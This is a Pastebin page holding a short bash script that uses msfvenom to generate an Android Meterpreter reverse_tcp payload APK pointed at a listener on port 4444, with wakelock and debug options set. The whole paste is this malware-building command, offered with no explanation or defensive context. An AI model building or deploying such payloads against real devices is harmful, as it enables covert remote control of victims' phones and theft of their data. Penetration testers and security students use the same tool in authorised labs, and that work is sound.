Advertisement
rc-chuah

metasploitapk1

Oct 5th, 2020 (edited)
245
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.21 KB | None | 0 0
  1. #!/bin/bash
  2.  
  3. msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 --platform android --arch dalvik AndroidHideAppIcon=false AndroidMeterpreterDebug=true AndroidWakelock=true -o metasploit.apk
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement